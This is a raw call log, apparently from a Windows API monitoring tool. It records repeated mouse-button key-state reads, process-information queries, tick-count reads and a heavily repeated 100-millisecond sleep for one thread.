Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 4
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 3
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 4
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 11
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 10
Fn
Thread 0x4f4
88 0
Category Operation Information Success Count Logfile
System Get Time type = Ticks, time = 21028 True 135
Fn
System Get Time type = Ticks, time = 21044 True 114
Fn
System Get Time type = Ticks, time = 28532 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 10523
Fn